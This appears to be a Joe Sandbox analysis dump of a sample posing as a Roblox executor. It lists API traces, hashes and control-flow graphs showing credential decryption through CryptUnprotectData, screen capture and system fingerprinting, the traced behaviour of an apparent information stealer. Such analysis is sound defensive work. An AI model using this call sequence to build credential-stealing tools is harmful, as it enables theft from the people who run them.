                                                                                          • Instruction ID: 8a6193ecb3d0c67ba0887ea8c4fd6cc0f5a06ebac7bcc86c7082a96b920ff16e
                                                                                          • Opcode Fuzzy Hash: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
                                                                                          • Instruction Fuzzy Hash: 9DF0AC3A511224BBCF271F96EC08AD93F6AFB4D7A1F058514FE1895120DA368861AB90
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002FA347
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 002FA356
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 002FA35F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 002FA36C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
                                                                                          • Instruction ID: 7f5d63be082fc715a90a5da0d52515c2fddb082c6a0e48f751318bcfd8494a74
                                                                                          • Opcode Fuzzy Hash: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
                                                                                          • Instruction Fuzzy Hash: BCF05F75D1020DEBCB01EBB4DA899DEBBF8FF1C704B9189A5A812E6110E734AA449B51
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 0030A1E5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?), ref: 0030A21C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
                                                                                          • Instruction ID: 658267192c86c197c2f7b75b07df88f0ec748f7025e6c9f7368984af5e7cee46
                                                                                          • Opcode Fuzzy Hash: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
                                                                                          • Instruction Fuzzy Hash: 9C51E435602B05AADB2BAB74AC62BB673ACEF08710F154469F9459B4C1F770ED4087A3
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00305071,?,?,00000000,00000000,00000000,?), ref: 00305195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
                                                                                          • Instruction ID: a75b7c3fcd5a6599d30866f7b0a95d2a0950c7bdfe87b5d6c4ce8da447aab61d
                                                                                          • Opcode Fuzzy Hash: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
                                                                                          • Instruction Fuzzy Hash: 50418972901609AFCF16CF94CD91AEEBBB9FF08300F198559FA08A7291D335A960DF51
                                                                                          APIs
                                                                                            • Part of subcall function 003056B7: HeapFree.KERNEL32(00000000,00000000,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056CD
                                                                                            • Part of subcall function 003056B7: GetLastError.KERNEL32(?,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056D8
                                                                                          • ___free_lconv_mon.LIBCMT ref: 00309ECE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID: 82$T2
                                                                                          • API String ID: 4068849827-560637959
                                                                                          • Opcode ID: 146cad94fb8428a00b6b900edc5f50c8edc3d5a4560b39460f9058404428801c
                                                                                          • Instruction ID: 4365e22f81b5f2f4f32ce54d528723ca7613ddb80973316a368943235a520f10
                                                                                          • Opcode Fuzzy Hash: 146cad94fb8428a00b6b900edc5f50c8edc3d5a4560b39460f9058404428801c
                                                                                          • Instruction Fuzzy Hash: 7A315C316027059FEB22AA38D865B5673E8EF40311F51541AF499DB1D2DF32EC80CF14
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002F31FD
                                                                                            • Part of subcall function 002F3990: std::_Lockit::_Lockit.LIBCPMT ref: 002F39BE
                                                                                            • Part of subcall function 002F3990: std::_Lockit::~_Lockit.LIBCPMT ref: 002F39E9
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002F3315
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                          • String ID: Pq/
                                                                                          • API String ID: 593203224-235438668
                                                                                          • Opcode ID: 9044836773b1c641cbc7c4e8006d86c94a3c4d88b9e7ab0207e18b7ae9dd0590
                                                                                          • Instruction ID: d944da776bda62904e8407bdac48856d5d3d5a81039df1a0f032728189c5324f
                                                                                          • Opcode Fuzzy Hash: 9044836773b1c641cbc7c4e8006d86c94a3c4d88b9e7ab0207e18b7ae9dd0590
                                                                                          • Instruction Fuzzy Hash: DA4191B4E202089FCB14DFA8D995AEDBBF0BB08790F104569E916A7350DB70AE54CF91
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002F771E
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002F777A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                          • String ID: Pq/
                                                                                          • API String ID: 593203224-235438668
                                                                                          • Opcode ID: 46698cc364737c2f242331c570b90cb15b3bd8bed2811e6828c3d5ffba104d71
                                                                                          • Instruction ID: bfcbbb206c2b98fe1c6b9a4d408c4e76b6efc87de590fe46f7ab350b57ad8fe9
                                                                                          • Opcode Fuzzy Hash: 46698cc364737c2f242331c570b90cb15b3bd8bed2811e6828c3d5ffba104d71
                                                                                          • Instruction Fuzzy Hash: 8C0192356101199FCB01EF14C995EADB7B8EF84750F1540A9E9019B360DF70EE01CF50
                                                                                          APIs
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 003064B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                          • String ID: InitializeCriticalSectionEx$Pq/
                                                                                          • API String ID: 2593887523-764408514
                                                                                          • Opcode ID: b79974603c46927bb391ed49be65beb5f66259277ef8a977003d5299451e7fe7
                                                                                          • Instruction ID: 8a0325e20ef245d9007690f2c1ed7be3673826b2ac782daf4f2ae3154b382e54
                                                                                          • Opcode Fuzzy Hash: b79974603c46927bb391ed49be65beb5f66259277ef8a977003d5299451e7fe7
                                                                                          • Instruction Fuzzy Hash: 93E09A32541228BBCB232F81CC07DDE7F19EF08BA0F048021FD28191A1CB728860AAD0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc
                                                                                          • String ID: FlsAlloc$Pq/
                                                                                          • API String ID: 2773662609-413776159
                                                                                          • Opcode ID: 52c74d8fd59f3e1ecd2e11ad16c7837385fec2cd475fa04cf7f5db224ae77462
                                                                                          • Instruction ID: c44988b8551f02d4912308333f93c9aa622e74660477a30637b2640eade29d0d
                                                                                          • Opcode Fuzzy Hash: 52c74d8fd59f3e1ecd2e11ad16c7837385fec2cd475fa04cf7f5db224ae77462
                                                                                          • Instruction Fuzzy Hash: A3E0C236AC2329B3C21727915C079EA7E08DF9CF61B040022FD16151A0DEA5486046DA

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:34.6%
                                                                                          Total number of Nodes:240
                                                                                          Total number of Limit Nodes:17
                                                                                          execution_graph 13006 42b8c3 13007 42b8cd 13006->13007 13007->13007 13008 42ccda GetPhysicallyInstalledSystemMemory 13007->13008 13009 42cd10 13008->13009 13009->13009 13010 43c640 13011 43c67a 13010->13011 13012 43c666 13010->13012 13013 43c685 13010->13013 13014 43c658 13010->13014 13016 43c66b RtlReAllocateHeap 13012->13016 13017 43a910 13013->13017 13014->13011 13014->13012 13014->13013 13016->13011 13018 43a923 13017->13018 13019 43a925 13017->13019 13018->13011 13020 43a92a RtlFreeHeap 13019->13020 13020->13011 13021 43a940 13022 43a960 13021->13022 13024 43a9ce 13022->13024 13029 43c6b0 LdrInitializeThunk 13022->13029 13024->13024 13026 43abc1 13024->13026 13028 43aace 13024->13028 13030 43c6b0 LdrInitializeThunk 13024->13030 13025 43a910 RtlFreeHeap 13025->13026 13028->13025 13029->13024 13030->13028 13158 437300 13160 437320 13158->13160 13159 43739e 13159->13159 13162 43747e 13159->13162 13164 43741e 13159->13164 13166 43c6b0 LdrInitializeThunk 13159->13166 13160->13159 13167 43c6b0 LdrInitializeThunk 13160->13167 13164->13162 13168 43c6b0 LdrInitializeThunk 13164->13168 13166->13164 13167->13159 13168->13162 13169 40c683 CoInitializeSecurity 13031 43ccca 13032 43cce0 13031->13032 13034 43cd4f 13032->13034 13038 43c6b0 LdrInitializeThunk 13032->13038 13037 43c6b0 LdrInitializeThunk 13034->13037 13036 43ce1c 13037->13036 13038->13034 13170 43c50f 13171 43c550 13170->13171 13171->13171 13172 43c56f LoadLibraryExW 13171->13172 13173 43c57d 13172->13173 13174 408690 13176 40869f 13174->13176 13175 40892f ExitProcess 13176->13175 13177 4086b4 GetCurrentProcessId GetCurrentThreadId 13176->13177 13178 408918 13176->13178 13179 408704 SHGetSpecialFolderPathW 13177->13179 13189 43c620 13178->13189 13182 408810 13179->13182 13183 4088b6 GetForegroundWindow 13182->13183 13184 4088cf 13183->13184 13184->13178 13188 40c650 CoInitializeEx 13184->13188 13192 43df00 13189->13192 13191 43c625 FreeLibrary 13191->13175 13193 43df09 13192->13193 13193->13191 13194 421113 13195 421120 13194->13195 13195->13195 13198 43fac0 13195->13198 13197 42123f 13199 43fae0 13198->13199 13199->13199 13200 43fc0e 13199->13200 13202 43c6b0 LdrInitializeThunk 13199->13202 13200->13197 13202->13200 13203 433210 10 API calls 13208 4332be 13203->13208 13204 4333a2 StretchBlt 13204->13204 13205 433402 DeleteObject 13204->13205 13206 4335ac DeleteObject 13204->13206 13207 433471 SelectObject DeleteDC ReleaseDC 13204->13207 13204->13208 13205->13208 13207->13204 13207->13205 13207->13206 13207->13207 13207->13208 13208->13204 13208->13205 13208->13206 13208->13207 13208->13208 13209 423811 13210 423819 13209->13210 13211 423829 RtlExpandEnvironmentStrings 13210->13211 13212 423848 13211->13212 13212->13212 13213 43fac0 LdrInitializeThunk 13212->13213 13218 423961 13213->13218 13214 423af7 13219 423bfb 13214->13219 13220 421570 13214->13220 13216 423ae1 GetLogicalDrives 13217 43fac0 LdrInitializeThunk 13216->13217 13217->13214 13218->13214 13218->13216 13218->13218 13218->13219 13221 43f920 LdrInitializeThunk 13220->13221 13224 4215b3 13221->13224 13223 43a910 RtlFreeHeap 13228 421be3 13223->13228 13225 421c66 13224->13225 13230 421674 13224->13230 13232 43c6b0 LdrInitializeThunk 13224->13232 13225->13219 13227 421bcf 13227->13223 13228->13225 13234 43c6b0 LdrInitializeThunk 13228->13234 13230->13227 13231 43a910 RtlFreeHeap 13230->13231 13233 43c6b0 LdrInitializeThunk 13230->13233 13231->13230 13232->13224 13233->13230 13234->13228 13240 43ea10 13241 43ea30 13240->13241 13244 43ea7e 13241->13244 13248 43c6b0 LdrInitializeThunk 13241->13248 13242 43ecad 13244->13242 13247 43eb6f 13244->13247 13249 43c6b0 LdrInitializeThunk 13244->13249 13245 43a910 RtlFreeHeap 13245->13242 13247->13245 13248->13244 13249->13247 13250 40da95 13256 4094e0 13250->13256 13252 40daa1 CoUninitialize 13253 40dac0 13252->13253 13254 40de88 CoUninitialize 13253->13254 13255 40deb0 13254->13255 13257 4094f4 13256->13257 13257->13252 13039 43d05b 13041 43d065 13039->13041 13040 43d15e 13041->13040 13043 43c6b0 LdrInitializeThunk 13041->13043 13043->13040 13044 43a8db RtlAllocateHeap 13258 430999 CoSetProxyBlanket 13045 40d1de 13046 40d270 13045->13046 13048 40d2ce 13046->13048 13049 43c6b0 LdrInitializeThunk 13046->13049 13049->13048 13050 42d863 13052 42d8a0 13050->13052 13051 42d8eb GetComputerNameExA 13052->13051 13052->13052 13053 420fe0 13054 421040 13053->13054 13055 420fee 13053->13055 13055->13054 13057 41f6e0 13055->13057 13058 41f74b 13057->13058 13069 414670 13058->13069 13070 414690 13069->13070 13075 43f920 13070->13075 13072 414760 13073 43f920 LdrInitializeThunk 13072->13073 13074 41496d 13073->13074 13076 43f940 13075->13076 13076->13076 13077 43fa6e 13076->13077 13079 43c6b0 LdrInitializeThunk 13076->13079 13077->13072 13079->13077 13259 43fd20 13261 43fd40 13259->13261 13260 43fe38 13263 43fd8e 13261->13263 13265 43c6b0 LdrInitializeThunk 13261->13265 13263->13260 13266 43c6b0 LdrInitializeThunk 13263->13266 13265->13263 13266->13260 13267 432527 13270 414660 13267->13270 13269 43252c CoSetProxyBlanket 13270->13269 13080 42bfe5 13081 42bff1 13080->13081 13081->13081 13082 42c00e FreeLibrary 13081->13082 13084 42c01b 13082->13084 13083 42c0ab GetComputerNameExA 13085 42c0fe 13083->13085 13084->13083 13084->13084 13085->13085 13086 43ca6b 13087 43ca90 13086->13087 13087->13087 13089 43cafe 13087->13089 13090 43c6b0 LdrInitializeThunk 13087->13090 13090->13089 13091 436469 13094 436490 13091->13094 13093 4364b9 13094->13093 13095 43c6b0 LdrInitializeThunk 13094->13095 13095->13094 13096 41726d 13097 417270 13096->13097 13098 417408 CryptUnprotectData 13097->13098 13099 417432 13098->13099 13271 418f2d 13272 418f32 13271->13272 13283 43ad70 13272->13283 13274 418f4d 13275 4191d4 13274->13275 13276 419284 13274->13276 13277 41955a 13274->13277 13280 419334 13274->13280 13282 43fac0 LdrInitializeThunk 13274->13282 13287 41c8b0 13275->13287 13281 41c8b0 LdrInitializeThunk 13276->13281 13278 41c8b0 LdrInitializeThunk 13277->13278 13278->13280 13281->13280 13282->13274 13284 43ae0e 13283->13284 13285 43ad7a 13283->13285 13284->13274 13285->13284 13299 43c6b0 LdrInitializeThunk 13285->13299 13288 41c8d5 13287->13288 13289 414670 LdrInitializeThunk 13288->13289 13290 41ca2b 13289->13290 13291 414670 LdrInitializeThunk 13290->13291 13292 41cb0b 13291->13292 13293 414670 LdrInitializeThunk 13292->13293 13294 41cb85 13293->13294 13295 414670 LdrInitializeThunk 13294->13295 13296 41cc38 13295->13296 13297 414670 LdrInitializeThunk 13296->13297 13298 41cc8a 13297->13298 13298->13276 13299->13284 13100 4366f3 13104 43e2b0 13100->13104 13103 436754 13105 436723 GetUserDefaultUILanguage 13104->13105 13105->13103 13106 426470 13107 426490 13106->13107 13110 42650e 13107->13110 13114 43c6b0 LdrInitializeThunk 13107->13114 13108 4267f3 13110->13108 13113 4265fe 13110->13113 13115 43c6b0 LdrInitializeThunk 13110->13115 13111 43a910 RtlFreeHeap 13111->13108 13113->13111 13114->13110 13115->13113 13300 410bb3 13301 410bcd 13300->13301 13302 410f52 RtlExpandEnvironmentStrings 13301->13302 13304 40ef94 13301->13304 13305 410fba 13302->13305 13305->13304 13306 4151c0 13305->13306 13307 4151e0 13306->13307 13307->13307 13308 43f920 LdrInitializeThunk 13307->13308 13309 41531d 13308->13309 13116 43f370 13117 43f381 13116->13117 13117->13117 13120 43f51e 13117->13120 13124 43c6b0 LdrInitializeThunk 13117->13124 13118 43f77f 13120->13118 13122 43f67f 13120->13122 13125 43c6b0 LdrInitializeThunk 13120->13125 13121 43a910 RtlFreeHeap 13121->13118 13122->13121 13124->13120 13125->13122 13126 40cbf6 13127 40cc10 13126->13127 13131 4374e0 13127->13131 13129 4374e0 11 API calls 13130 40cd3f 13129->13130 13130->13129 13132 437510 CoCreateInstance 13131->13132 13134 4376eb SysAllocString 13132->13134 13135 437b68 13132->13135 13138 4377b0 13134->13138 13137 437b78 GetVolumeInformationW 13135->13137 13144 437b9a 13137->13144 13139 437b57 SysFreeString 13138->13139 13140 4377b8 CoSetProxyBlanket 13138->13140 13139->13135 13141 4377d8 SysAllocString 13140->13141 13142 437b4d 13140->13142 13145 437890 13141->13145 13142->13139 13144->13130 13145->13145 13146 4378bd SysAllocString 13145->13146 13148 4378e4 13146->13148 13147 437b3b SysFreeString SysFreeString 13147->13142 13148->13147 13149 437b2d 13148->13149 13150 43792c VariantInit 13148->13150 13149->13147 13152 437980 13150->13152 13151 437b1c VariantClear 13151->13149 13152->13151 13310 43c7b9 13311 43ce49 GetForegroundWindow 13310->13311 13312 43ce57 13311->13312

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 6 433210-4332bc GetDC GetSystemMetrics * 2 GetCurrentObject GetObjectW DeleteObject CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt 7 4332c6-4332d6 6->7 8 4332be 6->8 9 4334c2-4334c8 7->9 10 4333a2-4333da StretchBlt 7->10 11 433402-43341f DeleteObject call 4335d0 7->11 12 433440-43344b 7->12 13 4332e0-4332eb 7->13 14 433560-43356b 7->14 15 433340-43334b 7->15 16 433464-43346a 7->16 17 433304-43330a 7->17 18 433588-433593 7->18 19 4334cf-4334f5 7->19 20 4335ac-4335c2 DeleteObject 7->20 21 433452-43345d 7->21 22 433572-433581 7->22 23 4332f2-4332fd 7->23 24 433352-433358 7->24 25 433471-43349f SelectObject DeleteDC ReleaseDC 7->25 26 433311-433331 call 407f30 7->26 27 4334b0-4334bb 7->27 28 433390-43339b 7->28 29 4333f0-4333fb 7->29 30 43359a-4335a5 7->30 31 43335f-433369 7->31 8->7 9->10 9->11 9->15 9->17 9->19 9->20 9->23 9->24 9->26 9->28 9->29 9->30 9->31 10->9 10->10 10->11 10->12 10->13 10->14 10->15 10->16 10->17 10->18 10->19 10->20 10->21 10->22 10->23 10->24 10->25 10->26 10->27 10->28 10->29 10->30 10->31 37 433424-433436 11->37 12->9 12->10 12->11 12->14 12->15 12->16 12->17 12->18 12->19 12->20 12->21 12->22 12->23 12->24 12->25 12->26 12->27 12->28 12->29 12->30 12->31 13->10 13->11 13->15 13->17 13->23 13->24 13->26 13->28 13->29 13->30 13->31 14->9 14->10 14->11 14->15 14->17 14->18 14->19 14->20 14->22 14->23 14->24 14->26 14->28 14->29 14->30 14->31 15->11 15->24 15->29 15->30 15->31 16->9 16->10 16->11 16->15 16->17 16->18 16->19 16->20 16->22 16->23 16->24 16->25 16->26 16->28 16->29 16->30 16->31 17->10 17->11 17->24 17->26 17->29 17->30 17->31 18->10 18->11 18->15 18->17 18->20 18->23 18->24 18->26 18->28 18->29 18->30 18->31 36 433500-433514 19->36 21->9 21->10 21->11 21->14 21->15 21->16 21->17 21->18 21->19 21->20 21->22 21->23 21->24 21->25 21->26 21->28 21->29 21->30 21->31 22->9 22->10 22->11 22->12 22->13 22->14 22->15 22->16 22->17 22->18 22->19 22->20 22->21 22->22 22->23 22->24 22->25 22->26 22->27 22->28 22->29 22->30 22->31 23->10 23->11 23->17 23->24 23->26 23->28 23->29 23->30 23->31 24->11 24->30 24->31 25->9 25->10 25->11 25->12 25->13 25->14 25->15 25->16 25->17 25->18 25->19 25->20 25->21 25->22 25->23 25->24 25->25 25->26 25->27 25->28 25->29 25->30 25->31 26->9 26->10 26->11 26->12 26->13 26->14 26->15 26->16 26->17 26->18 26->19 26->20 26->21 26->22 26->23 26->24 26->25 26->27 26->28 26->29 26->30 26->31 27->9 27->10 27->11 27->15 27->17 27->18 27->19 27->20 27->23 27->24 27->26 27->28 27->29 27->30 27->31 28->10 28->11 28->24 28->29 28->30 28->31 29->11 29->30 30->9 30->10 30->11 30->12 30->13 30->14 30->15 30->16 30->17 30->18 30->19 30->20 30->21 30->22 30->23 30->24 30->25 30->26 30->27 30->28 30->29 30->30 30->31 33 433370-43337d 31->33 34 43336b 31->34 33->9 33->10 33->11 33->12 33->13 33->14 33->15 33->16 33->17 33->18 33->19 33->20 33->21 33->22 33->23 33->24 33->25 33->26 33->27 33->28 33->29 33->30 33->31 34->33 36->36 39 433516-433533 call 408d60 36->39 37->9 37->10 37->11 37->12 37->13 37->14 37->15 37->16 37->17 37->18 37->19 37->20 37->21 37->22 37->23 37->24 37->25 37->26 37->27 37->28 37->29 37->30 37->31 42 433535 39->42 43 43353a-43354b 39->43 42->43 43->9 43->10 43->11 43->12 43->13 43->14 43->15 43->16 43->17 43->18 43->19 43->20 43->21 43->22 43->23 43->24 43->25 43->26 43->27 43->28 43->29 43->30 43->31
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 00433219
                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 00433229
                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 00433231
                                                                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 0043323A
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0043324A
                                                                                          • DeleteObject.GDI32(00000000), ref: 00433251
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00433260
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043326B
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00433277
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043329A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                          • String ID: -
                                                                                          • API String ID: 1298755333-2547889144
                                                                                          • Opcode ID: 4c70fb9fb3d48ba64cb561d81b8d275a8f00b4d1da52032b4a9da07f7ca7accf
                                                                                          • Instruction ID: 90b179be33757c8483f2c3ae36f1dbb71152b8a45cb403c83c0cea2860a487ee
                                                                                          • Opcode Fuzzy Hash: 4c70fb9fb3d48ba64cb561d81b8d275a8f00b4d1da52032b4a9da07f7ca7accf
